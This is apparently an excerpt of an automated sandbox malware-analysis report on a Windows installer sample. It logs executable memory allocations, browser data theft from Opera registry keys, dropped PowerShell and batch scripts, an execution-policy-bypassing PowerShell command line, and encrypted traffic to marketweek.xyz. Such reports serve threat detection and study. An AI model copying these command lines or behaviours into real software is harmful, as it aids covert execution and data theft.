NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02526000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02548000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02549000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028de000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 4, 2024, 11:14 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028df000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (2 events)

registry	HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Opera Software
registry	HKEY_CURRENT_USER\Software\Opera Software

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\onesave.ps1
file	C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\x64.bat
file	C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\idp.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	Powershell.exe -executionpolicy remotesigned -File onesave.ps1
cmdline	"C:\Windows\system32\cmd.exe" /C ""C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\x64.bat""

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\is-H4IH6.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-QUJ1E.tmp\utility-installer.tmp

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 4, 2024, 11:15 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (16 events)

Data received	[
Data received	WfÿQÈ§¤K¬bÙÜ-©E¼!ï9á©SïöFDOWNGRD .iÞ«û!kÁ%k"³%÷Ë#¯¶ujÇQÀ ÿ
Data received	ã
Data received	ß Ü²0®0T x}þTgâ, ½b¢\í0 HÎ=0;10 UUS10U Google Trust Services10 UWE10 240927064743Z 241226064742Z010Umarketweek.xyz0Y0HÎ=HÎ=B@L¾²î¢K~Cc¨RVÈnjæÝwÁÕBÃ/a$~GCE¶ÂÕM<à~üs0M\Í¦;6@£Y0U0Uÿ0U%0 +0Uÿ00U}²±ÓóB$<#«ju>D0U#0w5gÄÿ¨Ì©æ{Ùy{Ìù80^+R0P0'+0http://o.pki.goog/s/we1/g3g0%+0http://i.pki.goog/we1.crt0+U$0"marketweek.xyz.marketweek.xyz0U 0 0g06U/0-0+ ) '%http://c.pki.goog/we1/t3LJbZiBtsU.crl0 +ÖyõòðvîÍÐdÕÛÎÅ\·´Í¢2F\|¼ìÞÃQHYFqµ2s5¹G0E!«»0lë?èh{Ö94k¯h´ì%½òHQ¥ cG{Ì0H§À,¡Ðë²8:L.Íùñ¤©)Âä¯qú{vßáVëª¯µq¨À2N®VÙn§õ¥jÑÁ;¾R\2s6G0E :«.ç±ÒÝT%{nØ',û@Vý-ä$¼¶!ûwµü^àcñØìÓ^Í ]¦vj"Z\%0 HÎ=H0E!Ü¹-öÞj²ñs kôËðqBd/C8\| õÛä .ë MU¡Öc¦ÞÁ VpÇè±kFîêßFèà£00% ów,"Jv]¶Öã0 HÎ=0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R40 231213090000Z 290220140000Z0;10 UUS10U Google Trust Services10 UWE10Y0HÎ=HÎ=BoÍ:þgWGL!@ÂG]»XG@Á\Æ7çÕ\|íKÙ×¥ øÄÆèÿY,&õæ&%»úV£þ0û0Uÿ0U%0++0Uÿ0ÿ0Uw5gÄÿ¨Ì©æ{Ùy{Ìù80U#0LÖëtÿI6£ÕØüµ>Åjð04+(0&0$+0http://i.pki.goog/r4.crt0+U$0"0 http://c.pki.goog/r/r4.crl0U 0 0g0 HÎ=h0e1ç«QÖ÷CÎuþÑÕÌ@Az&¾Øó2-=®#HR>dy¯õ¦,nU±0&Ìhbç«~èÖD~ãLI¿lb4¸²¡~:P¼§ }sìRAMîâV~0z0b å0¿3C¾ÝI=0 H÷ 0W10 UBE10U GlobalSign nv-sa10URoot CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R40v0HÎ=+"bóts§h`®C¸5Å0{KIûÁaÎæÞF½kÕa5®@Ýs÷0Zë<î\|¢@v;©Æ¸GØçjsé±r9)¢Ó_^Xe¡eÑÜÉÇsÈj/åÄ«Ñ£ÿ0ü0Uÿ0U%0++0Uÿ0ÿ0ULÖëtÿI6£ÕØüµ>Åjð0U#0`{fE ÊP/}Í4¨ÿüýK06+0(0&+0http://i.pki.goog/gsr1.crt0-U&0$0" http://c.pki.goog/r/gsr1.crl0U 0 0g0 H÷ B»Öã?c ¤¡hH9"søËN-1éç ¡Ò6¬yëé°ëj¶{}t¸e«h*,,ÝBýÆqÏ-÷kÈn}Vâ#XXù%ºG× ý ¶à.®UÑyu5,1[?e¼ÍB§±^ñ»Ê-Gð¬c~¿ÖäkÓÖÓgX¸ÿ÷¦ IP[?:%ò\ÓyW6Îÿ&·©ñí>ÈnëÓ<8ÀAá^SÏ> Wëîâ?H¥ñ¾Ñj#û?/¢µ½ên£FÎ.g¯3&ªÕKÒ©6Å&;[Áå
Data received
Data received	AïÇ¥9qÛ Kâ5ç§ãî!a\(KËío¹SÃP>:JXñ¦t³R±wÁê/21Ì "XF0D i÷³O1+ÆO²PY½¬ºåþwzU_7Ü;F%O +ÏâDkòîÇT1 rØÄòÙ+kÑR'5-
Data received
Data received
Data received
Data received
Data received	0
Data received	Íbµv1K¼ ·~þ-¦æÍLæ£Á©&®W¤§_Áwãë¹-m¿Æè¨
Data received	P
Data received	WVgÅ¨HðÊhÝñõjÁGû9C=g~ÅØ²ëÇ:Æ¿?ÿgfÆ9B1½VÀ¡,!Ñ µÈ÷uÔkbÌ¹÷[îZÑPó³Lóªï¯ÃÅ¥X2ËïÙ ;I&ïR6+OÐÁÖ<çÆZÕ¬^¡^Ürå[M$kÒrm$-Õ¢¤%®J¯þ?R®ÞÉ·J}i=à´3¢¼,[A¬á<4¿!Ó¡(¢Fù.&Ò×ñ{ÓF£Í,\|¸LLÍV>wóúñç¿ÿn·¬«\ã¡xÀòÈK)>7ÿêï6~ÍG= hD¡#" -Ð"ÍÊÌ1WO8%©+¬ÚÎ)±é´~ðG>ËgçWJqiWáfån®÷ËæãBÇ3§.ÍgNþÕo ç;Ü»¶ð¯r%O¼»EÞ·çWcLóæ® W¸Y&¦À\|¬ êÅb^´Û0ÁìMu£xþ¹XQMÅZv¬Ívtnµ>±õÅüTãþ²ùÉòÉÝ\KÒüÓU¼`ªâìCaí ÊÂætCKeÕ¶¢+®ÓÿÜ`x]ÊÌræwSds©l@Ïh37{Þ"¥ßW[N,ÓÖBõÉd°K2¹?¼#µ¯ªî:\ÿ[áA°(.¥Í®!7qî ±ôÁ6îÆào¬ú-.ÆüViqÙ¢T9>gÜq
Data received
Data received	GqùÛ`°s½ÂL5rEhDxLFspo`£æ½*

Poweshell is sending data to a remote host (3 events)

Data sent	qmfÿO©j©dÆjXsÆ©øP°U¨VBÒµ©¦~À/5 ÀÀÀ À 28,ÿmarketweek.xyz
Data sent	FBAÌ#xï ÖH¤fÛ¨A÷I)ïoîã5µGh¯ð²½Bë:cæÛ8W-<ç4ÚyP¥ Ê#1ì0É JNOxÀ`·M«O¹õ[¸ÉA1ò¹T´+dMoßÙI9à3ð»1ñ8±¢
Data sent	$JÈÇG¶ÇÎrC`$;1cÔN6- B.vÓ]0Ò[öÔ(ãe6!Ç{Ð:æ&½Þ®¨±ü\ÎÇ©!Ë7kÊÒy µaµZ¨=©íÇè;Õ_Ðf,ækpHÿwò&æþ#£HPZÌà*åwh z:´ªÅUüÙúÏö

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 4, 2024, 11:14 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Queries for potentially installed applications (50 out of 221 events)

Time & API	Arguments	Status	Return
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
